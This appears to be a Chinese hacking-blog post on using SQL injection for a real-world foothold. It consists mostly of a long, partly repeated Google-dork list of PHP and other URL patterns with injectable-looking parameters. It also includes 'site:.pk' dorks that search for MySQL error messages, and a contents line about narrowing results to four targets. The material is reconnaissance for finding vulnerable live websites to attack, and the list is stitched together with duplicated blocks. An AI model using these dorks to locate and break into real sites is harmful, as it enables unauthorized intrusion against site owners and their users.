欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注
目录
Web2用sql漏洞实战打点。
一、先用Google hacking 搜:inurl=
二、最后筛选出4个目标:
4.1有用信息1
4.2有用信息2
4.3有用的信息3
Web2用sql漏洞实战打点。
一、先用Google hacking 搜:inurl=
english/board/view****.php?code=</br>---
title: GoogleHacking - SQL 注入
created: '2021-08-24T07:23:40.521Z'
modified: '2021-08-24T07:25:11.440Z'
---
# GoogleHacking - SQL 注入
about.php?cartID=</br>
accinfo.php?cartId=</br>
acclogin.php?cartID=</br>
add.php?bookid=</br>
add_cart.php?num=</br>
addcart.php?
addItem.php
add-to-cart.php?ID=</br>
addToCart.php?idProduct=</br>
addtomylist.php?ProdId=</br>
adminEditProductFields.php?intProdID=</br>
advSearch_h.php?idCategory=</br>
affiliate.php?ID=</br>
affiliate-agreement.cfm?storeid=</br>
affiliates.php?id=</br>
ancillary.php?ID=</br>
archive.php?id=</br>
article.php?id=</br>
phpx?PageID
basket.php?id=</br>
Book.php?bookID=</br>
book_list.php?bookid=</br>
book_view.php?bookid=</br>
BookDetails.php?ID=</br>
browse.php?catid=</br>
browse_item_details.php
Browse_Item_Details.php?Store_Id=</br>
buy.php?</br>
buy.php?bookid=</br>
bycategory.php?id=</br>
cardinfo.php?card=</br>
cart.php?action=</br>
cart.php?cart_id=</br>
cart.php?id=</br>
cart_additem.php?id=</br>
cart_validate.php?id=</br>
cartadd.php?id=</br>
cat.php?iCat=</br>
catalog.php</br>
catalog.php?CatalogID=</br>
catalog_item.php?ID=</br>
catalog_main.php?catid=</br>
category.php</br>
category.php?catid=</br>
category_list.php?id=</br>
categorydisplay.php?catid=</br>
checkout.php?cartid=</br>
checkout.php?UserID=</br>
checkout_confirmed.php?order_id=</br>
checkout1.php?cartid=</br>
comersus_listCategoriesAndProducts.php?idCategory=</br>
comersus_optEmailToFriendForm.php?idProduct=</br>
comersus_optReviewReadExec.php?idProduct=</br>
comersus_viewItem.php?idProduct=</br>
comments_form.php?ID=</br>
contact.php?cartId=</br>
content.php?id=</br>
customerService.php?****ID1=</br>
default.php?catID=</br>
description.php?bookid=</br>
details.php?BookID=</br>
details.php?Press_Release_ID=</br>
details.php?Product_ID=</br>
details.php?Service_ID=</br>
display_item.php?id=</br>
displayproducts.php
downloadTrial.php?intProdID=</br>
emailproduct.php?itemid=</br>
emailToFriend.php?idProduct=</br>
events.php?ID=</br>
faq.php?cartID=</br>
faq_list.php?id=</br>
faqs.php?id=</br>
feedback.php?title=</br>
freedownload.php?bookid=</br>
fullDisplay.php?item=</br>
getbook.php?bookid=</br>
GetItems.php?itemid=</br>
giftDetail.php?id=</br>
help.php?CartId=</br>
home.php?id=</br>
index.php?cart=</br>
index.php?cartID=</br>
index.php?ID=</br>
info.php?ID=</br>
item.php?eid=</br>
item.php?item_id=</br>
item.php?itemid=</br>
item.php?model=</br>
item.php?prodtype=</br>
item.php?shopcd=</br>
item_details.php?catid=</br>
item_list.php?maingroup
item_show.php?code_no=</br>
itemDesc.php?CartId=</br>
itemdetail.php?item=</br>
itemdetails.php?catalogid=</br>
learnmore.php?cartID=</br>
links.php?catid=</br>
list.php?bookid=</br>
List.php?CatID=</br>
listcategoriesandproducts.php?idCategory=</br>
modline.php?id=</br>
myaccount.php?catid=</br>
news.php?id=</br>
order.php?BookID=</br>
order.php?id=</br>
order.php?item_ID=</br>
OrderForm.php?Cart=</br>
page.php?PartID=</br>
payment.php?CartID=</br>
pdetail.php?item_id=</br>
powersearch.php?CartId=</br>
price.php</br>
privacy.php?cartID=</br>
prodbycat.php?intCatalogID=</br>
prodetails.php?prodid=</br>
prodlist.php?catid=</br>
product.php?bookID=</br>
product.php?intProdID=</br>
product_info.php?item_id=</br>
productDetails.php?idProduct=</br>
productDisplay.php</br>
productinfo.php?item=</br>
productlist.php?ViewType=</br>Category&CategoryID=</br>
productpage.php</br>
products.php?ID=</br>
products.php?keyword=</br>
products_category.php?CategoryID=</br>
products_detail.php?CategoryID=</br>
productsByCategory.php?intCatalogID=</br>
prodView.php?idProduct=</br>
promo.php?id=</br>
promotion.php?catid=</br>
pview.php?Item=</br>
resellers.php?idCategory=</br>
results.php?cat=</br>
savecart.php?CartId=</br>
search.php?CartID=</br>
searchcat.php?search_id=</br>
Select_Item.php?id=</br>
Services.php?ID=</br>
shippinginfo.php?CartId=</br>
shop.php?a=</br>
shop.php?action=</br>
shop.php?bookid=</br>
shop.php?cartID=</br>
shop_details.php?prodid=</br>
shopaddtocart.php
shopaddtocart.php?catalogid=</br>
shopbasket.php?bookid=</br>
shopbycategory.php?catid=</br>
shopcart.php?title=</br>
shopcreatorder.php
shopcurrency.php?cid=</br>
shopdc.php?bookid=</br>
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=</br>
shopdisplayproducts.php</br>
shopexd.php</br>
shopexd.php?catalogid=</br>
shopping_basket.php?cartID=</br>
shopprojectlogin.php</br>
shopquery.php?catalogid=</br>
shopremoveitem.php?cartid=</br>
shopreviewadd.php?id=</br>
shopreviewlist.php?id=</br>
ShopSearch.php?CategoryID=</br>
shoptellafriend.php?id=</br>
shopthanks.php</br>
shopwelcome.php?title=</br>
show_item.php?id=</br>
show_item_details.php?item_id=</br>
showbook.php?bookid=</br>
showStore.php?catID=</br>
shprodde.php?SKU=</br>
specials.php?id=</br>
store.php?id=</br>
store_bycat.php?id=</br>
store_listing.php?id=</br>
Store_ViewProducts.php?Cat=</br>
store-details.php?id=</br>
storefront.php?id=</br>
storefronts.php?title=</br>
storeitem.php?item=</br>
StoreRedirect.php?ID=</br>
subcategories.php?id=</br>
tek9.php?</br>
template.php?Action=</br>Item&pid=</br>
topic.php?ID=</br>
tuangou.php?bookid=</br>
type.php?iType=</br>
updatebasket.php?bookid=</br>
updates.php?ID=</br>
view.php?cid=</br>
view_cart.php?title=</br>
view_detail.php?ID=</br>
viewcart.php?CartId=</br>
viewCart.php?userID=</br>
viewCat_h.php?idCategory=</br>
viewevent.php?EventID=</br>
viewitem.php?recor=</br>
viewPrd.php?idcategory=</br>
ViewProduct.php?misc=</br>
voteList.php?item_ID=</br>
whatsnew.php?idCategory=</br>
WsAncillary.php?ID=</br>
WsPages.php?ID=</br>noticiasDetalle.php?xid=</br>
sitio/item.php?idcd=</br>
index.php?site=</br>
de/content.php?page_id=</br>
gallerysort.php?iid=</br>
products.php?type=</br>
event.php?id=</br>
showfeature.php?id=</br>
home.php?ID=</br>
tas/event.php?id=</br>
profile.php?id=</br>
details.php?id=</br>
past-event.php?id=</br>
index.php?action=</br>
site/products.php?prodid=</br>
page.php?pId=</br>
resources/vulnerabilities_list.php?id=</br>
site.php?id=</br>
products/index.php?rangeid=</br>
global_projects.php?cid=</br>
publications/view.php?id=</br>
display_page.php?id=</br>
pages.php?ID=</br>
lmsrecords_cd.php?cdid=</br>
product.php?prd=</br>
cat/?catid=</br>
products/product-list.php?id=</br>
debate-detail.php?id=</br>
cbmer/congres/page.php?LAN=</br>
content.php?id=</br>
news.php?ID=</br>
photogallery.php?id=</br>
index.php?id=</br>
product/product.php?product_no=</br>
nyheder.htm?show=</br>
book.php?ID=</br>
print.php?id=</br>
detail.php?id=</br>
book.php?id=</br>
content.php?PID=</br>
more_detail.php?id=</br>
content.php?id=</br>
view_items.php?id=</br>
view_author.php?id=</br>
main.php?id=</br>
english/fonction/print.php?id=</br>
magazines/adult_magazine_single_page.php?magid=</br>
product_details.php?prodid=</br>
magazines/adult_magazine_full_year.php?magid=</br>
products/card.php?prodID=</br>
catalog/product.php?cat_id=</br>
e_board/modifyform.html?code=</br>
community/calendar-event-fr.php?id=</br>
products.php?p=</br>
news.php?id=</br>
view/7/9628/1.html?reply=</br>
product_details.php?prodid=</br>
catalog/product.php?pid=</br>
rating.php?id=</br>
?page=</br>
catalog/main.php?cat_id=</br>
index.php?page=</br>
detail.php?prodid=</br>
products/product.php?pid=</br>
news.php?id=</br>
book_detail.php?BookID=</br>
catalog/main.php?cat_id=</br>
catalog/main.php?cat_id=</br>
default.php?cPath=</br>
catalog/main.php?cat_id=</br>
catalog/main.php?cat_id=</br>
category.php?catid=</br>
categories.php?cat=</br>
categories.php?cat=</br>
detail.php?prodID=</br>
detail.php?id=</br>
category.php?id=</br>
hm/inside.php?id=</br>
index.php?area_id=</br>
gallery.php?id=</br>
products.php?cat=</br>
products.php?cat=</br>
media/pr.php?id=</br>
books/book.php?proj_nr=</br>
products/card.php?prodID=</br>
general.php?id=</br>
news.php?t=</br>
usb/devices/showdev.php?id=</br>
content/detail.php?id=</br>
templet.php?acticle_id=</br>
news/news/title_show.php?id=</br>
product.php?id=</br>
index.php?url=</br>
cryolab/content.php?cid=</br>
ls.php?id=</br>
s.php?w=</br>
abroad/page.php?cid=</br>
bayer/dtnews.php?id=</br>
news/temp.php?id=</br>
index.php?url=</br>
book/bookcover.php?bookid=</br>
index.php/en/component/pvm/?view=</br>
product/list.php?pid=</br>
cats.php?cat=</br>
software_categories.php?cat_id=</br>
print.php?sid=</br>
docDetail.aspx?chnum=</br>
index.php?section=</br>
index.php?page=</br>
index.php?page=</br>
en/publications.php?id=</br>
events/detail.php?ID=</br>
forum/profile.php?id=</br>
media/pr.php?id=</br>
content.php?ID=</br>
cloudbank/detail.php?ID=</br>
pages.php?id=</br>
news.php?id=</br>
beitrag_D.php?id=</br>
content/index.php?id=</br>
index.php?i=</br>
?action=</br>
index.php?page=</br>
beitrag_F.php?id=</br>
index.php?pageid=</br>
page.php?modul=</br>
detail.php?id=</br>
index.php?w=</br>
index.php?modus=</br>
news.php?id=</br>
news.php?id=</br>
aktuelles/meldungen-detail.php?id=</br>
item.php?id=</br>
obio/detail.php?id=</br>
page/de/produkte/produkte.php?prodID=</br>
packages_display.php?ref=</br>
shop/index.php?cPath=</br>
modules.php?bookid=</br>
product-range.php?rangeID=</br>
en/news/fullnews.php?newsid=</br>
deal_coupon.php?cat_id=</br>
show.php?id=</br>
blog/index.php?idBlog=</br>
redaktion/whiteteeth/detail.php?nr=</br>
HistoryStore/pages/item.php?itemID=</br>
aktuelles/veranstaltungen/detail.php?id=</br>
tecdaten/showdetail.php?prodid=</br>
?id=</br>
rating/stat.php?id=</br>
content.php?id=</br>
viewapp.php?id=</br>
item.php?id=</br>
news/newsitem.php?newsID=</br>
FernandFaerie/index.php?c=</br>
show.php?id=</br>
?cat=</br>
categories.php?cat=</br>
category.php?c=</br>
product_info.php?id=</br>
prod.php?cat=</br>
store/product.php?productid=</br>
browsepr.php?pr=</br>
product-list.php?cid=</br>
products.php?cat_id=</br>
product.php?ItemID=</br>
category.php?c=</br>
main.php?id=</br>
article.php?id=</br>
showproduct.php?productId=</br>
view_item.php?item=</br>
skunkworks/content.php?id=</br>
index.php?id=</br>
item_show.php?id=</br>
publications.php?Id=</br>
index.php?t=</br>
view_items.php?id=</br>
portafolio/portafolio.php?id=</br>
YZboard/view.php?id=</br>
index_en.php?ref=</br>
index_en.php?ref=</br>
category.php?id_category=</br>
main.php?id=</br>
main.php?id=</br>
calendar/event.php?id=</br>
default.php?cPath=</br>
pages/print.php?id=</br>
index.php?pg_t=</br>
_news/news.php?id=</br>
forum/showProfile.php?id=</br>
fr/commande-liste-categorie.php?panier=</br>
downloads/shambler.php?id=</br>
sinformer/n/imprimer.php?id=</br>
More_Details.php?id=</br>
directory/contenu.php?id_cat=</br>
properties.php?id_cat=</br>
forum/showProfile.php?id=</br>
downloads/category.php?c=</br>
index.php?cat=</br>
product_info.php?products_id=</br>
product_info.php?products_id=</br>
product-list.php?category_id=</br>
detail.php?siteid=</br>
projects/event.php?id=</br>
view_items.php?id=</br>
more_details.php?id=</br>
melbourne_details.php?id=</br>
more_details.php?id=</br>
detail.php?id=</br>
more_details.php?id=</br>
home.php?cat=</br>
idlechat/message.php?id=</br>
detail.php?id=</br>
print.php?sid=</br>
more_details.php?id=</br>
default.php?cPath=</br>
events/event.php?id=</br>
brand.php?id=</br>
toynbeestudios/content.php?id=</br>
show-book.php?id=</br>
more_details.php?id=</br>
store/default.php?cPath=</br>
property.php?id=</br>
product_details.php?id=</br>
more_details.php?id=</br>
view-event.php?id=</br>
content.php?id=</br>
book.php?id=</br>
page/venue.php?id=</br>
print.php?sid=</br>
colourpointeducational/more_details.php?id=</br>
print.php?sid=</br>
browse/book.php?journalID=</br>
section.php?section=</br>
bookDetails.php?id=</br>
profiles/profile.php?profileid=</br>
event.php?id=</br>
gallery.php?id=</br>
category.php?CID=</br>
corporate/newsreleases_more.php?id=</br>
print.php?id=</br>
view_items.php?id=</br>
more_details.php?id=</br>
county-facts/diary/vcsgen.php?id=</br>
idlechat/message.php?id=</br>
podcast/item.php?pid=</br>
products.php?act=</br>
details.php?prodId=</br>
socsci/events/full_details.php?id=</br>
ourblog.php?categoryid=</br>
mall/more.php?ProdID=</br>
archive/get.php?message_id=</br>
review/review_form.php?item_id=</br>
english/publicproducts.php?groupid=</br>
news_and_notices.php?news_id=</br>
rounds-detail.php?id=</br>
gig.php?id=</br>
board/view.php?no=</br>
index.php?modus=</br>
news_item.php?id=</br>
rss.php?cat=</br>
products/product.php?id=</br>
details.php?ProdID=</br>
els_/product/product.php?id=</br>
store/description.php?iddesc=</br>
socsci/news_items/full_story.php?id=</br>
modules/forum/index.php?topic_id=</br>
feature.php?id=</br>
products/Blitzball.htm?id=</br>
profile_print.php?id=</br>
questions.php?questionid=</br>
html/scoutnew.php?prodid=</br>
main/index.php?action=</br>
********.php?cid=</br>
********.php?cid=</br>
news.php?type=</br>
index.php?page=</br>
viewthread.php?tid=</br>
summary.php?PID=</br>
news/latest_news.php?cat_id=</br>
index.php?cPath=</br>
category.php?CID=</br>
index.php?pid=</br>
more_details.php?id=</br>
specials.php?osCsid=</br>
search/display.php?BookID=</br>
articles.php?id=</br>
print.php?sid=</br>
page.php?id=</br>
more_details.php?id=</br>
newsite/pdf_show.php?id=</br>
shop/category.php?cat_id=</br>
shopcafe-shop-product.php?bookId=</br>
shop/books_detail.php?bookID=</br>
index.php?cPath=</br>
more_details.php?id=</br>
print.php?sid=</br>
specials.php?osCsid=</br>
store.php?cat_id=</br>
category.php?cid=</br>
displayrange.php?rangeid=</br>
product.php?id=</br>
csc/news-details.php?cat=</br>
products-display-details.php?prodid=</br>
stockists_list.php?area_id=</br>
news/newsitem.php?newsID=</br>
index.php?pid=</br>
newsitem.php?newsid=</br>
category.php?id=</br>
news/newsitem.php?newsID=</br>
details.php?prodId=</br>
publications/publication.php?id=</br>
purelydiamond/products/category.php?cat=</br>
category.php?cid=</br>
product/detail.php?id=</br>
news.php?id=</br>
more_details.php?id=</br>
shop/books_detail.php?bookID=</br>
more_details.php?id=</br>
blog.php?blog=</br>
index.php?pid=</br>
prodotti.php?id_cat=</br>
category.php?CID=</br>
more_details.php?id=</br>
poem_list.php?bookID=</br>
more_details.php?id=</br>
content.php?categoryId=</br>
authorDetails.php?bookID=</br>
press_release.php?id=</br>
item_list.php?cat_id=</br>
colourpointeducational/more_details.php?id=</br>
index.php?pid=</br>
download.php?id=</br>
shop/category.php?cat_id=</br>
i-know/content.php?page=</br>
store/index.php?cat_id=</br>
yacht_search/yacht_view.php?pid=</br>
pharmaxim/category.php?cid=</br>
news/newsitem.php?newsID=</br>
details.php?prodID=</br>
item.php?item_id=</br>
edition.php?area_id=</br>
page.php?area_id=</br>
view_newsletter.php?id=</br>
library.php?cat=</br>
categories.php?cat=</br>
page.php?area_id=</br>
categories.php?cat=</br>
publications.php?id=</br>
item.php?sub_id=</br>
page.php?area_id=</br>
page.php?area_id=</br>
category.php?catid=</br>
content.php?cID=</br>
newsitem.php?newsid=</br>
frontend/category.php?id_category=</br>
news/newsitem.php?newsID=</br>
things-to-do/detail.php?id=</br>
page.php?area_id=</br>
page.php?area_id=</br>
listing.php?cat=</br>
item.php?iid=</br>
customer/home.php?cat=</br>
staff/publications.php?sn=</br>
news/newsitem.php?newsID=</br>
library.php?cat=</br>
main/index.php?uid=</br>
library.php?cat=</br>
shop/eventshop/product_detail.php?itemid=</br>
news/newsitem.php?newsID=</br>
news/newsitem.php?newsID=</br>
library.php?cat=</br>
FullStory.php?Id=</br>
publications.php?ID=</br>
publications/book_reviews/full_review.php?id=</br>
newsitem.php?newsID=</br>
newsItem.php?newsId=</br>
site/en/list_service.php?cat=</br>
page.php?area_id=</br>
product.php?ProductID=</br>
releases_headlines_details.php?id=</br>
product.php?shopprodid=</br>
product.php?productid=</br>
product.php?product=</br>
product.php?product_id=</br>
productlist.php?id=</br>
product.php?shopprodid=</br>
garden_equipment/pest-weed-control/product.php?pr=</br>
product.php?shopprodid=</br>
browsepr.php?pr=</br>
productlist.php?id=</br>
kshop/product.php?productid=</br>
product.php?pid=</br>
showproduct.php?prodid=</br>
product.php?productid=</br>
productlist.php?id=</br>
index.php?pageId=</br>
productlist.php?tid=</br>
product-list.php?id=</br>
onlinesales/product.php?product_id=</br>
garden_equipment/Fruit-Cage/product.php?pr=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
productlist.php?tid=</br>
showsub.php?id=</br>
productlist.php?fid=</br>
products.php?cat=</br>
products.php?cat=</br>
product-list.php?id=</br>
product.php?sku=</br>
store/product.php?productid=</br>
products.php?cat=</br>
productList.php?cat=</br>
product_detail.php?product_id=</br>
product.php?pid=</br>
wiki/pmwiki.php?page****=</br>
summary.php?PID=</br>
productlist.php?grpid=</br>
cart/product.php?productid=</br>
db/CART/product_details.php?product_id=</br>
ProductList.php?id=</br>
products/product.php?id=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
product_ranges_view.php?ID=</br>
cei/cedb/projdetail.php?projID=</br>
products.php?DepartmentID=</br>
product.php?shopprodid=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
index.php?news=</br>
education/content.php?page=</br>
Interior/productlist.php?id=</br>
products.php?categoryID=</br>
modules.php?****=</br>
message/comment_threads.php?postID=</br>
artist_art.php?id=</br>
products.php?cat=</br>
index.php?option=</br>
ov_tv.php?item=</br>
index.php?lang=</br>
showproduct.php?cat=</br>
index.php?lang=</br>
product.php?bid=</br>
product.php?bid=</br>
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=</br>
item_show.php?lid=</br>
?pagerequested=</br>
downloads.php?id=</br>
print.php?sid=</br>
print.php?sid=</br>
product.php?intProductID=</br>
productList.php?id=</br>
product.php?intProductID=</br>
more_details.php?id=</br>
more_details.php?id=</br>
books.php?id=</br>
index.php?offs=</br>
mboard/replies.php?parent_id=</br>
Computer Science.php?id=</br>
news.php?id=</br>
pdf_post.php?ID=</br>
reviews.php?id=</br>
art.php?id=</br>
prod.php?cat=</br>
event_info.php?p=</br>
view_items.php?id=</br>
home.php?cat=</br>
item_book.php?CAT=</br>
www/index.php?page=</br>
schule/termine.php?view=</br>
goods_detail.php?data=</br>
storemanager/contents/item.php?page_code=</br>
view_items.php?id=</br>
customer/board.htm?mode=</br>
help/com_view.html?code=</br>
n_replyboard.php?typeboard=</br>
eng_board/view.php?T****=</br>
prev_results.php?prodID=</br>
bbs/view.php?no=</br>
gnu/?doc=</br>
zb/view.php?uid=</br>
global/product/product.php?gubun=</br>
m_view.php?ps_db=</br>
naboard/memo.php?bd=</br>
bookmark/mybook/bookmark.php?bookPageNo=</br>
board/board.html?table=</br>
kboard/kboard.php?board=</br>
order.asp?lotid=</br>
english/board/view****.php?code=</br>
goboard/front/board_view.php?code=</br>
bbs/bbsView.php?id=</br>
boardView.php?bbs=</br>
eng/rgboard/view.php?&bbs_id=</br>
product/product.php?cate=</br>
content.php?p=</br>
page.php?module=</br>
?pid=</br>
bookpage.php?id=</br>
view_items.php?id=</br>
index.php?pagina=</br>
product.php?prodid=</br>
notify/notify_form.php?topic_id=</br>
php/index.php?id=</br>
content.php?cid=</br>
product.php?product_id=</br>
constructies/product.php?id=</br>
detail.php?id=</br>
php/index.php?id=</br>
index.php?section=</br>
product.php?****=</br>
show_bug.cgi?id=</br>
detail.php?id=</br>
bookpage.php?id=</br>
product.php?id=</br>
today.php?eventid=</br>
main.php?item=</br>
index.php?cPath=</br>
news.php?id=</br>
event.php?id=</br>
print.php?sid=</br>
news/news.php?id=</br>
module/range/dutch_windmill_collection.php?rangeId=</br>
print.php?sid=</br>
show_bug.cgi?id=</br>
product_details.php?product_id=</br>
products.php?groupid=</br>
projdetails.php?id=</br>
product.php?productid=</br>
products.php?catid=</br>
product.php?product_id=</br>
product.php?prodid=</br>
product.php?prodid=</br>
newsitem.php?newsID=</br>
newsitem.php?newsid=</br>
profile.php?id=</br>
********s_in_area.php?area_id=</br>
productlist.php?id=</br>
productsview.php?proid=</br>
rss.php?cat=</br>
pub/pds/pds_view.php?start=</br>
products.php?rub=</br>
ogloszenia/rss.php?cat=</br>
print.php?sid=</br>
product.php?id=</br>
print.php?sid=</br>
magazin.php?cid=</br>
galerie.php?cid=</br>
www/index.php?page=</br>
view.php?id=</br>
content.php?id=</br>
board/read.php?tid=</br>
product.php?id_h=</br>
news.php?id=</br>
index.php?book=</br>
products.php?act=</br>
reply.php?id=</br>
stat.php?id=</br>
products.php?cat_id=</br>
free_board/board_view.html?page=</br>
item.php?id=</br>
view_items.php?id=</br>
main.php?prodID=</br>
gb/comment.php?gb_id=</br>
gb/comment.php?gb_id=</br>
classifieds/showproduct.php?product=</br>
view.php?pageNum_rscomp=</br>
cart/addToCart.php?cid=</br>
content/pages/index.php?id_cat=</br>
content.php?id</br>
display.php?ID=</br>
display.php?ID=</br>
ponuky/item_show.php?ID=</br>
default.php?cPath=</br>
main/magpreview.php?id=</br>
***zine/board.php?board=</br>
content.php?arti_id=</br>
mall/more.php?ProdID=</br>
product.php?cat=</br>
news.php?id=</br>
content/view.php?id=</br>
content.php?id=</br>
index.php?action=</br>
board_view.php?s_board_id=</br>
KM/BOARD/readboard.php?id=</br>
board_view.html?id=</br>
content.php?cont_title=</br>
category.php?catid=</br>
mall/more.php?ProdID=</br>
publications.php?id=</br>
irbeautina/product_detail.php?product_id=</br>
print.php?sid=</br>
index_en.php?id=</br>
bid/topic.php?TopicID=</br>
news_content.php?CategoryID=</br>
front/bin/forumview.phtml?bbcode=</br>
cat.php?cat_id=</br>
stat.php?id=</br>
veranstaltungen/detail.php?id=</br>
more_details.php?id=</br>
english/print.php?id=</br>
print.php?id=</br>
view_item.php?id=</br>
content/conference_register.php?ID=</br>
rss/event.php?id=</br>
event.php?id=</br>
main.php?id=</br>
rtfe.php?siteid=</br>
category.php?cid=</br>
classifieds/detail.php?siteid=</br>
tools/print.php?id=</br>
channel/channel-layout.php?objId=</br>
content.php?id=</br>
resources/detail.php?id=</br>
more_details.php?id=</br>
detail.php?id=</br>
view_items.php?id=</br>
content/programme.php?ID=</br>
detail.php?id=</br>
default.php?cPath=</br>
more_details.php?id=</br>
content.php?id=</br>
view_items.php?id=</br>
default.php?cPath=</br>
book.php?id=</br>
view_items.php?id=</br>
products/parts/detail.php?id=</br>
category.php?cid=</br>
book.html?isbn=</br>
view_item.php?id=</br>
picgallery/category.php?cid=</br>
detail.php?id=</br>
print.php?sid=</br>
displayArticleB.php?id=</br>
knowledge_base/detail.php?id=</br>
bpac/calendar/event.php?id=</br>
mb_showtopic.php?topic_id=</br>
pages.php?id=</br>
content.php?id=</br>
exhibition_overview.php?id=</br>
singer/detail.php?siteid=</br>
Category.php?cid=</br>
detail.php?id=</br>
print.php?sid=</br>
category.php?cid=</br>
more_detail.php?X_EID=</br>
book.php?ISBN=</br>
view_items.php?id=</br>
category.php?cid=</br>
htmlpage.php?id=</br>
story.php?id=</br>
tools/print.php?id=</br>
print.php?sid=</br>
php/event.php?id=</br>
print.php?sid=</br>
articlecategory.php?id=</br>
print.php?sid=</br>
ibp.php?ISBN=</br>
club.php?cid=</br>
view_items.php?id=</br>
aboutchiangmai/details.php?id=</br>
view_items.php?id=</br>
book.php?isbn=</br>
blog_detail.php?id=</br>
event.php?id=</br>
default.php?cPath=</br>
product_info.php?products_id=</br>
shop_display_products.php?cat_id=</br>
print.php?sid=</br>
modules/content/index.php?id=</br>
printcards.php?ID=</br>
events/event.php?ID=</br>
more_details.php?id=</br>
default.php?TID=</br>
general.php?id=</br>
detail.php?id=</br>
event.php?id=</br>
referral/detail.php?siteid=</br>
view_items.php?id=</br>
event.php?id=</br>
view_items.php?id=</br>
category.php?id=</br>
cemetery.php?id=</br>
index.php?cid=</br>
content.php?id=</br>
exhibitions/detail.php?id=</br>
bookview.php?id=</br>
edatabase/home.php?cat=</br>
view_items.php?id=</br>
store/view_items.php?id=</br>
print.php?sid=</br>
events/event_detail.php?id=</br>
view_items.php?id=</br>
detail.php?id=</br>
pages/video.php?id=</br>
about_us.php?id=</br>
recipe/category.php?cid=</br>
view_item.php?id=</br>
en/main.php?id=</br>
print.php?sid=</br>
More_Details.php?id=</br>
category.php?cid=</br>
home.php?cat=</br>
article.php?id=</br>
page.php?id=</br>
print-story.php?id=</br>
psychology/people/detail.php?id=</br>
print.php?sid=</br>
print.php?ID=</br>
article_preview.php?id=</br>
Pages/whichArticle.php?id=</br>
view_items.php?id=</br>
Sales/view_item.php?id=</br>
book.php?isbn=</br>
knowledge_base/detail.php?id=</br>
gallery/gallery.php?id=</br>
event.php?id=</br>
detail.php?id=</br>
store/home.php?cat=</br>
view_items.php?id=</br>
detail.php?ID=</br>
event_details.php?id=</br>
detailedbook.php?isbn=</br>
fatcat/home.php?view=</br>
events/index.php?id=</br>
static.php?id=</br>
answer/default.php?pollID=</br>
news/detail.php?id=</br>
view_items.php?id=</br>
events/unique_event.php?ID=</br>
gallery/detail.php?ID=</br>
print.php?sid=</br>
view_items.php?id=</br>
board/showthread.php?t=</br>
book.php?id=</br>
event.php?id=</br>
more_detail.php?id=</br>
knowledge_base/detail.php?id=</br>
html/print.php?sid=</br>
index.php?id=</br>
content.php?ID=</br>
Shop/home.php?cat=</br>
store/home.php?cat=</br>
print.php?sid=</br>
gallery.php?id=</br>
resources/index.php?cat=</br>
events/event.php?id=</br>
view_items.php?id=</br>
default.php?cPath=</br>
content.php?id=</br>
products/products.php?p=</br>
auction/item.php?id=</br>
products.php?cat=</br>
clan_page.php?cid=</br>
product.php?sku=</br>
item.php?id=</br>
events?id=</br>
comments.php?id=</br>
products/?catID=</br>
modules.php?****=</br>
fshstatistic/index.php?PID=</br>
products/products.php?p=</br>
sport.php?revista=</br>
products.php?p=</br>
products.php?openparent=</br>
home.php?cat=</br>
news/shownewsarticle.php?articleid=</br>
discussions/10/9/?CategoryID=</br>
trailer.php?id=</br>
news.php?id=</br>
?page=</br>
index.php?page=</br>
item/detail.php?num=</br>
features/view.php?id=</br>
site/?details&prodid=</br>
product_info.php?products_id=</br>
remixer.php?id=</br>
proddetails_print.php?prodid=</br>
pylones/item.php?item=</br>
index.php?cont=</br>
product.php?ItemId=</br>
video.php?id=</br>
detail.php?item_id=</br>
filemanager.php?delete=</br>
news/newsletter.php?id=</br>
shop/home.php?cat=</br>
designcenter/item.php?id=</br>
board/kboard.php?board=</br>
index.php?id=</br>
board/view_temp.php?table=</br>
magazine-details.php?magid=</br>
site:.pk intext:Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in & “id”</br>
site:.pk intext:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in & “id”</br>
about.php?cartID=</br>
accinfo.php?cartId=</br>
acclogin.php?cartID=</br>
add.php?bookid=</br>
add_cart.php?num=</br>
addcart.php?</br>
addItem.php</br>
add-to-cart.php?ID=</br>
addToCart.php?idProduct=</br>
addtomylist.php?ProdId=</br>
adminEditProductFields.php?intProdID=</br>
advSearch_h.php?idCategory=</br>
affiliate.php?ID=</br>
affiliate-agreement.cfm?storeid=</br>
affiliates.php?id=</br>
ancillary.php?ID=</br>
archive.php?id=</br>
article.php?id=</br>
phpx?PageID</br>
basket.php?id=</br>
Book.php?bookID=</br>
book_list.php?bookid=</br>
book_view.php?bookid=</br>
BookDetails.php?ID=</br>
browse.php?catid=</br>
browse_item_details.php
Browse_Item_Details.php?Store_Id=</br>
buy.php?</br>
buy.php?bookid=</br>
bycategory.php?id=</br>
cardinfo.php?card=</br>
cart.php?action=</br>
cart.php?cart_id=</br>
cart.php?id=</br>
cart_additem.php?id=</br>
cart_validate.php?id=</br>
cartadd.php?id=</br>
cat.php?iCat=</br>
catalog.php</br>
catalog.php?CatalogID=</br>
catalog_item.php?ID=</br>
catalog_main.php?catid=</br>
category.php</br>
category.php?catid=</br>
category_list.php?id=</br>
categorydisplay.php?catid=</br>
checkout.php?cartid=</br>
checkout.php?UserID=</br>
checkout_confirmed.php?order_id=</br>
checkout1.php?cartid=</br>
comersus_listCategoriesAndProducts.php?idCategory=</br>
comersus_optEmailToFriendForm.php?idProduct=</br>
comersus_optReviewReadExec.php?idProduct=</br>
comersus_viewItem.php?idProduct=</br>
comments_form.php?ID=</br>
contact.php?cartId=</br>
content.php?id=</br>
customerService.php?****ID1=</br>
default.php?catID=</br>
description.php?bookid=</br>
details.php?BookID=</br>
details.php?Press_Release_ID=</br>
details.php?Product_ID=</br>
details.php?Service_ID=</br>
display_item.php?id=</br>
displayproducts.php</br>
downloadTrial.php?intProdID=</br>
emailproduct.php?itemid=</br>
emailToFriend.php?idProduct=</br>
events.php?ID=</br>
faq.php?cartID=</br>
faq_list.php?id=</br>
faqs.php?id=</br>
feedback.php?title=</br>
freedownload.php?bookid=</br>
fullDisplay.php?item=</br>
getbook.php?bookid=</br>
GetItems.php?itemid=</br>
giftDetail.php?id=</br>
help.php?CartId=</br>
home.php?id=</br>
index.php?cart=</br>
index.php?cartID=</br>
index.php?ID=</br>
info.php?ID=</br>
item.php?eid=</br>
item.php?item_id=</br>
item.php?itemid=</br>
item.php?model=</br>
